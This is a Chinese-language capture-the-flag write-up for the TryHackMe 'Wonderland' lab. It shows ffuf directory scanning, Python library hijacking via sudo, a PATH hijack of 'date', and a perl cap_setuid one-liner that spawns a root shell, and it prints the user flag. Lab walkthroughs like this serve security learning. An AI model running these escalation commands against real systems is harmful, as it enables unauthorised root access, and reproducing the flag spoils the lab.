tryhackem_wonderland
涉及,解密,扫描,横向移动,纵向移动
仙境
掉进兔子洞,进入仙境。
获得shell
解法一:
目录扫描
ffuf -u http://10.10.134.189/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -c
ffuf -u http://10.10.134.189/r/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -c -r
ffuf -u http://10.10.134.189/r/a/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -c -r
ffuf -u http://10.10.134.189/r/a/b/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -c -r
ffuf -u http://10.10.134.189/r/a/b/b/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -c -r
ffuf -u http://10.10.134.189/r/a/b/b/i/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -c -r
ffuf -u http://10.10.134.189/r/a/b/b/i/t/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -c -r然后查看源码,会发现一个依据。
解法二:
查看源码时会发现/img目录,进入之后
然后主页也是
跟着白色走
可能会产生疑问,但是当你扫一次目录后明白了
shell提权
alice
当你ls发现目录下为root.txt时,就会知道这并不简单,根据提示这里的一切都是颠倒的。
很容易想到cat /root/user.txt
thm{"Curiouser and curiouser!"}find虽然啥也没找到,但是sudo -l找到一个
查看python文件会发现使用了random库,ok
捏造一个
echo 'import os;os.system("/bin/bash")' > random.py
chmod +x random.py
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
此时就来到了
rabbit
cat 查看
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Sat, 08 Apr 2023 07:54:53 +0000
Ask very nicely, and I will give you some tea while you wait for him很明显用到了date,此时只需修改PATH,伪造一个date即可提权
咳咳,之前的笔记:https://www.cnblogs.com/-Lucky-/p/17195932.html
执行即可
此时来到了
hatter
发现密码
尝试使用此密码 ssh 为我们提供一个完整的 shell 作为用户hatter
接下来就嘎了
getcap -r / 2>/dev/null 命令用于递归地查找整个文件系统上所有带有特殊权限的文件,并将其输出到标准输出中。
/usr/bin/perl5.26.1 文件是 Perl 语言的解释器程序。cap_setuid+ep 是它的安全标志,其中 ep 表示可执行程序具有特权执行(privileged execution)权限,即在执行该程序时,进程的执行者可以提升自己的特权等级,而 cap_setuid 表示程序具有设置用户 ID 权限(setuid)的能力。很幸运地在:https://gtfobins.github.io/gtfobins/perl/
找到了利用方法
/usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
此时为root
手机扫一扫
移动阅读更方便
你可能感兴趣的文章